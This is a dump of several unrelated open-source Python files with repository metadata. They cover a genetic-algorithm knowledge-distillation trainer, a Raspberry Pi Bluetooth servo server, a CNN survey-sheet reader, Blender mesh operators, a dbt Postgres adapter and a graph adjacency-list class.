self.crossover_rate) < 1:\n self.reproduction_rate = 1 - (self.mutation_rate + self.crossover_rate)\n number_of_reproductions = int((self.reproduction_rate * self.population_size))\n if not number_of_mutations + number_of_crossovers + number_of_reproductions == len(self.population):\n if not number_of_crossovers == 0:\n number_of_crossovers += len(self.population) - (\n number_of_mutations + number_of_crossovers + number_of_reproductions)\n elif not number_of_mutations == 0:\n number_of_mutations += len(self.population) - (\n number_of_mutations + number_of_crossovers + number_of_reproductions)\n best = self.population[0] # before: best = best_individual\n index = 0\n new_population: List[Solution] = []\n for i in range(number_of_reproductions):\n new_population.append(self.selection())\n if new_population[index].fitter(best) == 1:\n best = new_population[index]\n index += 1\n for i in range(number_of_mutations):\n new_population.append(self.mutation(self.selection(), trainingItems))\n if new_population[index].fitter(best) == 1:\n best = new_population[index]\n index += 1\n for i in range(number_of_crossovers):\n new_population.append(self.crossover(self.selection(), self.selection(), trainingItems))\n if new_population[index].fitter(best) == 1:\n best = new_population[index]\n index += 1\n self.population = new_population\n return best\n\n def evolve(self, trainingParameters):\n\n # create neural 
network.\n # Device configuration\n teacher_model_number = trainingParameters[0]\n student_model_number = trainingParameters[1]\n BATCH_SIZE = trainingParameters[2]\n\n device = get_device()\n\n # CIFAR-100 dataset\n train_dataset = CIFAR100(root='../../../data/', train=True, transform=trainingAugmentation(), download=True)\n test_dataset = CIFAR100(root='../../../data/', train=False, transform=testingAugmentation())\n\n # Data loader\n train_dl = DataLoader(dataset=train_dataset, batch_size=BATCH_SIZE, shuffle=True)\n test_dl = DataLoader(dataset=test_dataset, batch_size=BATCH_SIZE, shuffle=False)\n\n # RESNET 110\n teacher_chk_path = \"../../../NeuralNetwork/resnet110_0.7018.ckpt\"\n teacher_model = None\n if path.exists(teacher_chk_path):\n print(\"Loaded teacher model.\")\n teacher_model = ResNet(ResidualBlock, [teacher_model_number, teacher_model_number, teacher_model_number])\n teacher_model.load_state_dict(torch.load(teacher_chk_path))\n else:\n print(\"No teacher model found.\")\n exit()\n\n student_model = ResNet(ResidualBlock, [student_model_number, student_model_number, student_model_number])\n\n teacher_model = to_device(teacher_model, device)\n student_model = to_device(student_model, device)\n train_dl = ToDeviceLoader(train_dl, device)\n test_dl = ToDeviceLoader(test_dl, device)\n\n epochs = trainingParameters[3]\n optimizer = trainingParameters[4]\n max_lr = trainingParameters[5]\n distill_optimizer = trainingParameters[6]\n distill_lr = trainingParameters[7]\n grad_clip = trainingParameters[8]\n weight_decay = trainingParameters[9]\n scheduler = trainingParameters[10]\n kd_loss_type = trainingParameters[11]\n heuristicToLayerDict = trainingParameters[12]\n numOfBatchesToDistill = trainingParameters[13]\n initial_epochs = trainingParameters[14]\n total_epochs = trainingParameters[15]\n\n '''# Save old student weights to a file:\n torch.save(student_model.state_dict(), \"../../../NeuralNetwork/resnet20_initial.ckpt\")\n\n # Train student for x epoch(s) and save its weights to a file:\n student_initialized_chk_path = \"../../../NeuralNetwork/resnet20_initialized_10_epochs.ckpt\"\n if not path.exists(student_initialized_chk_path):\n print(\"Training student model before distillation experimentation...\")\n student_model = train_student(student_model, 10, train_dl, test_dl, optimizer, max_lr, weight_decay,\n scheduler,\n grad_clip)\n\n torch.save(student_model.state_dict(), \"../../../NeuralNetwork/resnet20_initialized_10_epochs.ckpt\")\n else:\n print(\"Partially trained student model found.\")'''\n\n '''# Save old student weights to a file:\n torch.save(student_model.state_dict(), \"../../../NeuralNetwork/resnet56_initial.ckpt\")'''\n\n '''student_model.load_state_dict(torch.load(student_initialized_chk_path))\n for batch in train_dl:\n images, label = batch\n for image in images:\n print(getFeatureMaps(student_model, device, image))\n exit()'''\n\n # Train student for x epoch(s) and save its weights to a file:\n student_initialized_chk_path = \"../../../NeuralNetwork/resnet56_initialized_\" + str(initial_epochs) + \"_epochs.ckpt\"\n if not path.exists(student_initialized_chk_path):\n print(\"Training student model before distillation experimentation...\")\n student_model = train_student(student_model, initial_epochs, total_epochs, train_dl, test_dl, optimizer, max_lr, weight_decay,\n scheduler,\n teacher_model, grad_clip)\n\n torch.save(student_model.state_dict(), \"../../../NeuralNetwork/resnet56_initialized_\" + str(initial_epochs) + \"_epochs.ckpt\")\n else:\n 
print(\"Partially trained student model found.\")\n\n layerCounter = []\n trainingItems = [heuristicToLayerDict, epochs, train_dl, test_dl, student_model,\n student_model_number,\n teacher_model, teacher_model_number, device, optimizer, max_lr, weight_decay, scheduler,\n kd_loss_type, distill_optimizer, distill_lr, grad_clip, initial_epochs, layerCounter]\n\n if self.print_:\n print(\"Generation 0\")\n best = self.create_population(trainingItems)\n if self.print_:\n print(\"Best Fitness:\", best.get_fitness())\n print(\"Heuristic Combination:\", best.get_heuristic_combination())\n print()\n count = 0\n bestArr = []\n while count < self.no_of_generations:\n if self.print_:\n print(\"Generation\", count + 1)\n ind = self.regenerate(best, trainingItems)\n bestArr.append(ind.get_fitness())\n if ind.fitter(best) == 1:\n best = ind\n if self.print_:\n print(\"Generation Best Fitness:\", ind.get_fitness())\n print(\"Generation Best Heuristic Combination: \" + ind.get_heuristic_combination())\n print(\"Overall Best Fitness:\", best.get_fitness())\n print(\"Overall Best Heuristic Combination: \" + best.get_heuristic_combination())\n print()\n count += 1\n\n print(\"Completed evolving heuristic combination.\")\n plot_ga_best(bestArr)\n print(\"Generation best graph created.\")\n plot_layer_counter(layerCounter)\n print(\"Layer counter graph created.\")\n print(\"Now training with heuristic combination...\")\n\n student_init_chk_path = \"../../../NeuralNetwork/resnet56_initialized_\" + str(initial_epochs) + \"_epochs.ckpt\"\n if path.exists(student_init_chk_path):\n student_model.load_state_dict(torch.load(student_init_chk_path))\n else:\n print(\"Initial student weights file not found.\")\n exit()\n\n history = [evaluate(student_model, test_dl)]\n history += train_model_with_distillation(best.get_heuristic_combination(), heuristicToLayerDict, epochs, initial_epochs, total_epochs,\n best.get_batches(), numOfBatchesToDistill,\n train_dl,\n test_dl, student_model, student_model_number, teacher_model,\n teacher_model_number,\n device, optimizer, max_lr,\n weight_decay, scheduler, kd_loss_type, distill_optimizer,\n distill_lr, grad_clip)\n\n plot_acc(history)\n plot_loss(history)\n\n return best\n","repo_name":"byrongt12/evolutionary_knowledge_distillation","sub_path":"GeneticAlgorithm/GeneticAlgorithm.py","file_name":"GeneticAlgorithm.py","file_ext":"py","file_size_in_byte":25302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"36839925208","text":"#!/usr/bin/python\n\nimport bluetooth\nimport RPi.GPIO as GPIO\nimport time\nimport sys\n\nGPIO.setwarnings(False)\nGPIO.setmode(GPIO.BOARD)\nGPIO.setup(33, GPIO.OUT)\n\npwm = GPIO.PWM(33, 50)\npwm.start(2.5) # min 2.5, max 11.5 180 degrees\n\nhost = \"\"\n# Creaitng Socket Bluetooth RFCOMM communication\nserver = bluetooth.BluetoothSocket(bluetooth.RFCOMM)\nprint('Bluetooth Socket Created')\ntry:\n\tserver.bind((host, bluetooth.PORT_ANY))\n\tprint(\"Bluetooth Binding Completed\")\nexcept:\n\tprint(\"Bluetooth Binding Failed\")\n\nserver.listen(1) # One connection at a time\nport = server.getsockname()[1]\n\nuuid = \"94f39d29-7d6d-437d-973b-fba39e49d4ee\"\n\nbluetooth.advertise_service(server, \"SampleServer\", service_id=uuid,\n service_classes=[uuid, bluetooth.SERIAL_PORT_CLASS],\n profiles=[bluetooth.SERIAL_PORT_PROFILE],\n # protocols=[bluetooth.OBEX_UUID]\n )\n\nprint(\"Waiting for connection on RFCOMM channel\", port)\n# Server accepts the clients request and assigns a mac address. 
\nclient, address = server.accept()\nprint(\"Connected To\", address)\nprint(\"Client:\", client)\ntry:\n\twhile True:\n\t\t# Receivng the data. \n\t\tdata = client.recv(1024) # 1024 is the buffer size.\n\t\t# print(data)\n\t\t\n\t\tif data == \"stop\":\n\t\t\tpwm.start(0)\n\t\t\tsend_data = \"Stop \"\n\t\telif data == \"middle\":\n\t\t\tpwm.ChangeDutyCycle(7.0)\n\t\t\tsend_data = \"Middle \"\n\t\telif data == \"right\":\n\t\t\tpwm.ChangeDutyCycle(2.5)\n\t\t\tsend_data = \"Right \"\n\t\telif data == \"left\":\n\t\t\tpwm.ChangeDutyCycle(11.5)\n\t\t\tsend_data = \"Left \"\n\t\telse:\n\t\t\tsend_data = \"Error \"\n\t\t# Sending the data.\n\t\tclient.send(send_data) \nexcept:\n\t# Closing the client and server connection\n\tclient.close()\n\tserver.close()\n","repo_name":"chenphilip888/rpi3b-bluetooth","sub_path":"rfcomm_server_servo.py","file_name":"rfcomm_server_servo.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"10470947231","text":"import numpy as np\nimport cv2 as cv, os\nfrom service.text_localization import text_localization\nfrom keras.models import load_model\nimport pandas as pd\n\n# import matplotlib.pyplot as plt\n# from keras.preprocessing import image\n\nanswer = [[],[],[],[],[]]\n\nmydict = {'1':0, '2':0, '3':0, '4':0, '5':0}\n\ndef deep_machine(img) :\n model1 = load_model('./service/DL/model/CNN_colab_m1.h5')\n model2 = load_model('./service/DL/model/CNN_colab_m2.h5')\n model3 = load_model('./service/DL/model/CNN_colab_m3.h5')\n model4 = load_model('./service/DL/model/CNN_colab_m4.h5')\n model5 = load_model('./service/DL/model/CNN_colab_m5.h5')\n \n img = cv.imread(img,0)\n\n resimg = cv.cvtColor(img, cv.COLOR_GRAY2BGR)\n # ======================================================\n ret, thr = cv.threshold(img, 127, 255, cv.THRESH_BINARY)\n\n start_box, end_box = text_localization(thr)\n\n box_list = []\n\n count = 1\n q_num = 1\n check = 0\n # answer = [[0 for j in range(1)] for i in range(5)]\n \n for i in range(len(start_box)):\n if len(start_box) != 26 :\n break\n\n if count % 6 == 4 : #1번 체크\n save_img = img[start_box[i][0]:end_box[i][0], start_box[i][1]:end_box[i][1]].copy()\n save_img = cv.resize(save_img, (64, 64), interpolation=cv.INTER_CUBIC)\n save_img = cv.cvtColor(save_img, cv.COLOR_GRAY2BGR)\n \n cols, rows = save_img.shape[:2]\n M = cv.getRotationMatrix2D((cols/2, rows/2), 180, 1)\n save_img = cv.warpAffine(save_img, M, (cols, rows))\n \n save_img = save_img.reshape(-1, 64, 64, 3)\n save_img = save_img.astype('float32')/ 255\n\n yhat = model1.predict(save_img)\n \n if yhat[0][0] >= 0.5:\n color = (0, 0, 255)\n prediction = 'check 1'\n check = 1\n \n else :\n color = (255, 0, 0)\n prediction = 'non 1'\n \n cv.rectangle(resimg, \n (start_box[i][1], start_box[i][0]), \n (end_box[i][1], end_box[i][0]), \n color)\n \n count = count + 1\n \n elif count % 6 == 5 : #2번 체크\n save_img = img[start_box[i][0]:end_box[i][0], start_box[i][1]:end_box[i][1]].copy()\n save_img = cv.resize(save_img, (64, 64), interpolation=cv.INTER_CUBIC)\n save_img = cv.cvtColor(save_img, cv.COLOR_GRAY2BGR)\n \n cols, rows = save_img.shape[:2]\n M = cv.getRotationMatrix2D((cols/2, rows/2), 180, 1)\n save_img = cv.warpAffine(save_img, M, (cols, rows))\n\n save_img = save_img.reshape(-1, 64, 64, 3)\n save_img = save_img.astype('float32')/ 255\n\n yhat = model2.predict(save_img)\n \n if yhat[0][0] >= 0.5:\n color = (0, 0, 255)\n prediction = 'check 2'\n check = 2\n \n else :\n color = (255, 0, 
0)\n prediction = 'non 2'\n \n\n \n cv.rectangle(resimg, \n (start_box[i][1], start_box[i][0]), \n (end_box[i][1], end_box[i][0]), \n color)\n \n count = count + 1\n \n elif count % 6 == 0 : #3번 체크\n save_img = img[start_box[i][0]:end_box[i][0], start_box[i][1]:end_box[i][1]].copy()\n save_img = cv.resize(save_img, (64, 64), interpolation=cv.INTER_CUBIC)\n save_img = cv.cvtColor(save_img, cv.COLOR_GRAY2BGR)\n \n cols, rows = save_img.shape[:2]\n M = cv.getRotationMatrix2D((cols/2, rows/2), 180, 1)\n save_img = cv.warpAffine(save_img, M, (cols, rows))\n \n save_img = save_img.reshape(-1, 64, 64, 3)\n save_img = save_img.astype('float32')/ 255\n\n yhat = model3.predict(save_img)\n \n if yhat[0][0] >= 0.5:\n color = (0, 0, 255)\n prediction = 'check 2'\n check = 3\n \n else :\n color = (255, 0, 0)\n prediction = 'non 2'\n \n\n \n cv.rectangle(resimg, \n (start_box[i][1], start_box[i][0]), \n (end_box[i][1], end_box[i][0]), \n color)\n \n count = count + 1\n \n elif count % 6 == 1 : #4번 체크\n if i == 0 :\n count = count + 1\n continue\n save_img = img[start_box[i][0]:end_box[i][0], start_box[i][1]:end_box[i][1]].copy()\n save_img = cv.resize(save_img, (64, 64), interpolation=cv.INTER_CUBIC)\n save_img = cv.cvtColor(save_img, cv.COLOR_GRAY2BGR)\n \n cols, rows = save_img.shape[:2]\n M = cv.getRotationMatrix2D((cols/2, rows/2), 180, 1)\n save_img = cv.warpAffine(save_img, M, (cols, rows))\n \n save_img = save_img.reshape(-1, 64, 64, 3)\n save_img = save_img.astype('float32')/ 255\n\n yhat = model4.predict(save_img)\n \n if yhat[0][0] >= 0.5:\n color = (0, 0, 255)\n prediction = 'check 2'\n check = 4\n \n else :\n color = (255, 0, 0)\n prediction = 'non 2'\n \n\n \n cv.rectangle(resimg, \n (start_box[i][1], start_box[i][0]), \n (end_box[i][1], end_box[i][0]), \n color)\n \n count = count + 1\n \n elif count % 6 == 2 : #5번 체크\n if i == 1:\n count = count + 1\n continue\n save_img = img[start_box[i][0]:end_box[i][0], start_box[i][1]:end_box[i][1]].copy()\n save_img = cv.resize(save_img, (64, 64), interpolation=cv.INTER_CUBIC)\n save_img = cv.cvtColor(save_img, cv.COLOR_GRAY2BGR)\n \n cols, rows = save_img.shape[:2]\n M = cv.getRotationMatrix2D((cols/2, rows/2), 180, 1)\n save_img = cv.warpAffine(save_img, M, (cols, rows))\n \n save_img = save_img.reshape(-1, 64, 64, 3)\n save_img = save_img.astype('float32')/ 255\n\n yhat = model5.predict(save_img)\n \n if yhat[0][0] >= 0.5:\n color = (0, 0, 255)\n prediction = 'check 2'\n check = 5\n \n else :\n color = (255, 0, 0)\n prediction = 'non 2'\n \n\n \n cv.rectangle(resimg, \n (start_box[i][1], start_box[i][0]), \n (end_box[i][1], end_box[i][0]), \n color)\n\n answer[q_num].append(check)\n\n q_num = q_num + 1\n check = 0\n count = count + 1\n \n elif count % 6 == 3 : #번호\n count = count + 1\n \n cols, rows = resimg.shape[:2]\n\n M = cv.getRotationMatrix2D((rows/2, cols/2), 180, 1)\n resimg = cv.warpAffine(resimg, M, (rows, cols))\n\n # cv.imwrite('./text_local_' + str(img) + '.png', resimg)\n cv.waitKey(0)\n cv.destroyAllWindows()\n\n return answer\n\n\npath_dir = './service/static/upload'\ndef dl_folder():\n answer = [[],[],[],[],[]]\n file_list = os.listdir(path_dir)\n filecount =0\n for f in file_list:\n\n filecount +=1\n temp = deep_machine(path_dir+'/'+f)\n \n answer = answer + temp\n resultNumber = temp\n myarr = countSurveyNumber(resultNumber)\n # answer +=deep_machine(path_dir+'/'+f)\n # resultNumber = deep_machine(path_dir+'/'+f)\n # countSurveyNumber(resultNumber)\n\n #개별 응답 결과\n\n sur = []\n for count in range(0, filecount):\n line = []\n for 
i in range(6, 10):\n line.append(answer[i][count])\n sur.append(line)\n\n #문항별 응답 결과\n question1 = answer.__getitem__(6)\n question2 = answer[7]\n question3 = answer[8]\n question4 = answer[9]\n\n def add(questionNum):\n number1 = 0\n number2 = 0\n number3 = 0\n number4 = 0\n number5 = 0\n for i in questionNum:\n if i == 1:\n number1 += 1\n if i == 2:\n number2 += 1\n if i == 3:\n number3 += 1\n if i == 4:\n number4 += 1\n if i == 5:\n number5 += 1\n surveyResult = []\n surveyResult.append(number1)\n surveyResult.append(number2)\n surveyResult.append(number3)\n surveyResult.append(number4)\n surveyResult.append(number5)\n return surveyResult\n\n\n sResult1= add(question1)\n sResult2= add(question2)\n sResult3 = add(question3)\n sResult4 = add(question4)\n\n sResult = []\n sResult.append(sResult1) #1번문항에 체크된 보기 1,2,3,4의 결과 배열\n sResult.append(sResult2) #2번문항에 체크된 보기 1,2,3,4의 결과 배열\n sResult.append(sResult3) #3번문항에 체크된 보기 1,2,3,4의 결과 배열\n sResult.append(sResult4) #4번문항에 체크된 보기 1,2,3,4의 결과 배열\n sResult.append(sur) #시험지 사진 당 각 문항 체크 보기 번호 배열\n\n # 엑셀 저장_개별 응답결과\n yResult = []\n yResult.append(sur[0:1])\n yResult.append(sur[1:2])\n yResult.append(sur[2:3])\n yResult.append(sur[3:4])\n yResult.append(sur[4:5])\n\n data2 = pd.DataFrame(yResult)\n data2 = data2.rename(index={0: \"응답자 1\"})\n data2 = data2.rename(index={1: \"응답자 2\"})\n data2 = data2.rename(index={2: \"응답자 3\"})\n data2 = data2.rename(index={3: \"응답자 4\"})\n data2 = data2.rename(index={4: \"응답자 5\"})\n data2.columns = ['1~4번 응답결과']\n data2.head();\n data2.to_csv('개별 응답결과.csv', encoding='cp949')\n\n\n\n return sResult, myarr\n #return answer\n\n\n# deep_machine('./doc/img1.jpg')\n\n# dictionary 1번~5번까지 총 합 저장.\ndef countSurveyNumber(checkedNumber):\n arr = [0,0,0,0,0]\n if not checkedNumber :\n print('checkedNumber is null')\n\n if checkedNumber:\n for numbers in checkedNumber:\n if numbers:\n # item = str(number[0])\n # temp = mydict.get(item)\n # temp+=1\n # mydict[item] = temp\n for item in numbers:\n if item == 1:\n arr[0]+=1\n \n elif item ==2:\n arr[1]+=1\n \n elif item ==3:\n arr[2] +=1\n \n elif item ==4:\n arr[3] +=1\n \n elif item ==5:\n arr[4] +=1\n\n return arr\n","repo_name":"5Hanui/LookIt-Web","sub_path":"service/DL/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":10976,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"50"} +{"seq_id":"38660877663","text":"import webbrowser as browser\nfrom get_symbols import getRobinhoodSymbols\n\ndef main():\n my_stocks = getRobinhoodSymbols()\n for ticker in my_stocks:\n browser.open('https://finance.yahoo.com/chart/' + ticker)\n\nif __name__ == '__main__':\n main()","repo_name":"plsloan/Stock_Analysis","sub_path":"open_robinhood_stocks.py","file_name":"open_robinhood_stocks.py","file_ext":"py","file_size_in_byte":257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"23996514787","text":"# 3Dビュー > メッシュ編集モード > 「X」キー\n\nimport bpy\nimport bmesh\n\n################\n# オペレーター #\n################\n\nclass DeleteBySelectMode(bpy.types.Operator):\n\tbl_idname = \"mesh.delete_by_select_mode\"\n\tbl_label = \"Delete the selection mode and the same element\"\n\tbl_description = \"Same mesh selection mode of the current element (vertices, sides and faces) remove\"\n\tbl_options = {'REGISTER', 'UNDO'}\n\t\n\tdef execute(self, context):\n\t\tmode = context.tool_settings.mesh_select_mode[:]\n\t\tif (mode[0]):\n\t\t\tbpy.ops.mesh.delete(type=\"VERT\")\n\t\telif 
(mode[1]):\n\t\t\tbpy.ops.mesh.delete(type=\"EDGE\")\n\t\telif (mode[2]):\n\t\t\tbpy.ops.mesh.delete(type=\"FACE\")\n\t\treturn {'FINISHED'}\n\nclass DeleteHideMesh(bpy.types.Operator):\n\tbl_idname = \"mesh.delete_hide_mesh\"\n\tbl_label = \"Remove the covering\"\n\tbl_description = \"Delete all are mesh\"\n\tbl_options = {'REGISTER', 'UNDO'}\n\t\n\tdef execute(self, context):\n\t\tobj = context.active_object\n\t\tif (obj.type != 'MESH'):\n\t\t\tself.report(type={\"ERROR\"}, message=\"Mesh objects are not\")\n\t\t\treturn {\"CANCELLED\"}\n\t\tme = obj.data\n\t\tbm = bmesh.from_edit_mesh(me)\n\t\tfor face in bm.faces[:]:\n\t\t\tif (face.hide):\n\t\t\t\tbm.faces.remove(face)\n\t\tfor edge in bm.edges[:]:\n\t\t\tif (edge.hide):\n\t\t\t\tbm.edges.remove(edge)\n\t\tfor vert in bm.verts[:]:\n\t\t\tif (vert.hide):\n\t\t\t\tbm.verts.remove(vert)\n\t\tbmesh.update_edit_mesh(me)\n\t\treturn {'FINISHED'}\n\n################\n\n\n# menu\ndef menu(self, context):\n\n\tself.layout.separator()\n\tself.layout.operator(DeleteBySelectMode.bl_idname, icon=\"PLUGIN\")\n\tself.layout.operator(DeleteHideMesh.bl_idname, icon=\"PLUGIN\")\n\tself.layout.operator('mesh.dissolve_mode')\n","repo_name":"JT-a/blenderpython279","sub_path":"scripts/addons_extern/AF_3dview_menus/VIEW3D_MT_edit_mesh_delete.py","file_name":"VIEW3D_MT_edit_mesh_delete.py","file_ext":"py","file_size_in_byte":1626,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"50"} +{"seq_id":"9304657385","text":"import psycopg2\n\nfrom contextlib import contextmanager\n\nimport dbt.adapters.default\nimport dbt.compat\nimport dbt.exceptions\nimport agate\n\nfrom dbt.logger import GLOBAL_LOGGER as logger\n\n\nGET_RELATIONS_OPERATION_NAME = 'get_relations_data'\n\n\nclass PostgresAdapter(dbt.adapters.default.DefaultAdapter):\n\n DEFAULT_TCP_KEEPALIVE = 0 # 0 means to use the default value\n\n @contextmanager\n def exception_handler(self, sql, model_name=None, connection_name=None):\n try:\n yield\n\n except psycopg2.DatabaseError as e:\n logger.debug('Postgres error: {}'.format(str(e)))\n\n try:\n # attempt to release the connection\n self.release_connection(connection_name)\n except psycopg2.Error:\n logger.debug(\"Failed to release connection!\")\n pass\n\n raise dbt.exceptions.DatabaseException(\n dbt.compat.to_string(e).strip())\n\n except Exception as e:\n logger.debug(\"Error running SQL: %s\", sql)\n logger.debug(\"Rolling back transaction.\")\n self.release_connection(connection_name)\n raise dbt.exceptions.RuntimeException(e)\n\n @classmethod\n def type(cls):\n return 'postgres'\n\n @classmethod\n def date_function(cls):\n return 'datenow()'\n\n @classmethod\n def get_status(cls, cursor):\n return cursor.statusmessage\n\n @classmethod\n def get_credentials(cls, credentials):\n return credentials\n\n @classmethod\n def open_connection(cls, connection):\n if connection.state == 'open':\n logger.debug('Connection is already open, skipping open.')\n return connection\n\n base_credentials = connection.credentials\n credentials = cls.get_credentials(connection.credentials.incorporate())\n kwargs = {}\n keepalives_idle = credentials.get('keepalives_idle',\n cls.DEFAULT_TCP_KEEPALIVE)\n # we don't want to pass 0 along to connect() as postgres will try to\n # call an invalid setsockopt() call (contrary to the docs).\n if keepalives_idle:\n kwargs['keepalives_idle'] = keepalives_idle\n\n try:\n handle = psycopg2.connect(\n dbname=credentials.dbname,\n user=credentials.user,\n host=credentials.host,\n 
password=credentials.password,\n port=credentials.port,\n connect_timeout=10,\n **kwargs)\n\n connection.handle = handle\n connection.state = 'open'\n except psycopg2.Error as e:\n logger.debug(\"Got an error when attempting to open a postgres \"\n \"connection: '{}'\"\n .format(e))\n\n connection.handle = None\n connection.state = 'fail'\n\n raise dbt.exceptions.FailedToConnectException(str(e))\n\n return connection\n\n def cancel_connection(self, connection):\n connection_name = connection.name\n pid = connection.handle.get_backend_pid()\n\n sql = \"select pg_terminate_backend({})\".format(pid)\n\n logger.debug(\"Cancelling query '{}' ({})\".format(connection_name, pid))\n\n _, cursor = self.add_query(sql, 'master')\n res = cursor.fetchone()\n\n logger.debug(\"Cancel query '{}': {}\".format(connection_name, res))\n\n # DATABASE INSPECTION FUNCTIONS\n # These require the profile AND project, as they need to know\n # database-specific configs at the project level.\n def alter_column_type(self, schema, table, column_name,\n new_column_type, model_name=None):\n \"\"\"\n 1. Create a new column (w/ temp name and correct type)\n 2. Copy data over to it\n 3. Drop the existing column (cascade!)\n 4. Rename the new column to existing column\n \"\"\"\n\n relation = self.Relation.create(\n schema=schema,\n identifier=table,\n quote_policy=self.config.quoting\n )\n\n opts = {\n \"relation\": relation,\n \"old_column\": column_name,\n \"tmp_column\": \"{}__dbt_alter\".format(column_name),\n \"dtype\": new_column_type\n }\n\n sql = \"\"\"\n alter table {relation} add column \"{tmp_column}\" {dtype};\n update {relation} set \"{tmp_column}\" = \"{old_column}\";\n alter table {relation} drop column \"{old_column}\" cascade;\n alter table {relation} rename column \"{tmp_column}\" to \"{old_column}\";\n \"\"\".format(**opts).strip() # noqa\n\n connection, cursor = self.add_query(sql, model_name)\n\n return connection, cursor\n\n def _link_cached_relations(self, manifest, schemas):\n try:\n table = self.run_operation(manifest, GET_RELATIONS_OPERATION_NAME)\n finally:\n self.release_connection(GET_RELATIONS_OPERATION_NAME)\n table = self._relations_filter_table(table, schemas)\n\n for (refed_schema, refed_name, dep_schema, dep_name) in table:\n referenced = self.Relation.create(schema=refed_schema,\n identifier=refed_name)\n dependent = self.Relation.create(schema=dep_schema,\n identifier=dep_name)\n self.cache.add_link(dependent, referenced)\n\n def _list_relations(self, schema, model_name=None):\n sql = \"\"\"\n select tablename as name, schemaname as schema, 'table' as type from pg_tables\n where schemaname ilike '{schema}'\n union all\n select viewname as name, schemaname as schema, 'view' as type from pg_views\n where schemaname ilike '{schema}'\n \"\"\".format(schema=schema).strip() # noqa\n\n connection, cursor = self.add_query(sql, model_name, auto_begin=False)\n\n results = cursor.fetchall()\n\n return [self.Relation.create(\n database=self.config.credentials.dbname,\n schema=_schema,\n identifier=name,\n quote_policy={\n 'schema': True,\n 'identifier': True\n },\n type=type)\n for (name, _schema, type) in results]\n\n def get_existing_schemas(self, model_name=None):\n sql = \"select distinct nspname from pg_namespace\"\n\n connection, cursor = self.add_query(sql, model_name, auto_begin=False)\n results = cursor.fetchall()\n\n return [row[0] for row in results]\n\n def check_schema_exists(self, schema, model_name=None):\n sql = \"\"\"\n select count(*) from pg_namespace where nspname = '{schema}'\n 
\"\"\".format(schema=schema).strip() # noqa\n\n connection, cursor = self.add_query(sql, model_name,\n auto_begin=False)\n results = cursor.fetchone()\n\n return results[0] > 0\n\n @classmethod\n def convert_text_type(cls, agate_table, col_idx):\n return \"text\"\n\n @classmethod\n def convert_number_type(cls, agate_table, col_idx):\n decimals = agate_table.aggregate(agate.MaxPrecision(col_idx))\n return \"float8\" if decimals else \"integer\"\n\n @classmethod\n def convert_boolean_type(cls, agate_table, col_idx):\n return \"boolean\"\n\n @classmethod\n def convert_datetime_type(cls, agate_table, col_idx):\n return \"timestamp without time zone\"\n\n @classmethod\n def convert_date_type(cls, agate_table, col_idx):\n return \"date\"\n\n @classmethod\n def convert_time_type(cls, agate_table, col_idx):\n return \"time\"\n","repo_name":"alexpatton/dbt","sub_path":"dbt/adapters/postgres/impl.py","file_name":"impl.py","file_ext":"py","file_size_in_byte":7602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"50"} +{"seq_id":"39917570230","text":"\"\"\"\nTaller 2 | Semana 9 | Jesús Alberto Domínguez Charris\n\n- Determinar si existe un camino válido entre dos vértices (línea 287)\n- Determinar si el grafo tiene, al menos un ciclo (línea 320)\n- Determinar si el grafo es fuertemente conexo (línea 344)\n- Determinar si el grafo es completo (línea 360)\n\"\"\"\n\nimport sys\n\nclass Arco:\n def __init__(self, verticeInical, verticeFinal, peso: int) -> None:\n self.verticeInicial = verticeInical\n self.verticeFinal = verticeFinal\n self.peso = peso\n\n def __repr__(self) -> str:\n return f\"[{self.verticeInicial}, {self.verticeFinal}]: {self.peso}\"\n\n def __str__(self) -> str:\n return self.__repr__()\n \n def __eq__(self, otro: object) -> bool:\n if not isinstance(otro, Arco):\n return False\n return self.verticeInicial == otro.verticeInicial and \\\n self.verticeFinal == otro.verticeFinal and \\\n self.peso == otro.peso\n \n def __hash__(self) -> int:\n return hash(str(self))\n\n\nclass ListaAdyacencia:\n def __init__(self) -> None:\n self.__listaVertices = dict()\n\n def __str__(self) -> str:\n return str(self.__listaVertices)\n \n def buscarVertice(self, datoBuscar):\n return self.__listaVertices.get(datoBuscar)\n\n def adicionarVertice(self, nuevoVertice):\n if self.buscarVertice(nuevoVertice) is None:\n listaAdyacentes = set()\n self.__listaVertices[nuevoVertice] = listaAdyacentes\n\n def verVertices(self):\n return list(self.__listaVertices.keys())\n\n def contarVertices(self):\n return len(self.__listaVertices)\n\n def existenAmbosVertices(self, verticeInicial, verticeFinal):\n buscarIninial = self.buscarVertice(verticeInicial)\n buscarFinal = self.buscarVertice(verticeFinal)\n if buscarIninial is None or buscarFinal is None:\n return False\n else:\n return True\n \n def adicionarArco(self, verticeInicial, verticeFinal, peso: int = 0):\n if self.existenAmbosVertices(verticeInicial, verticeFinal):\n arco = Arco(verticeInicial, verticeFinal, peso)\n buscarIninial: set = self.buscarVertice(verticeInicial)\n buscarIninial.add(arco)\n \n def buscarArcoConPeso(self, verticeInicial, verticeFinal, peso: int):\n if self.existenAmbosVertices(verticeInicial, verticeFinal):\n arcoTemporal = Arco(verticeInicial, verticeFinal, peso)\n return arcoTemporal in self.buscarVertice(verticeInicial)\n \n def buscarArcoSinPeso(self, verticeInicial, verticeFinal):\n if self.existenAmbosVertices(verticeInicial, verticeFinal):\n conjunto: set = self.buscarVertice(verticeInicial)\n 
